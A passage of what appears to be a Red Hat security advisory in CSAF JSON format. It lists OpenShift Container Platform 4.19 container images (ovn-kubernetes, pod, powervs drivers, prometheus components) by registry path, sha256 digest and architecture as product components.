"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x as a component of Red Hat OpenShift Container Platform 4.19",
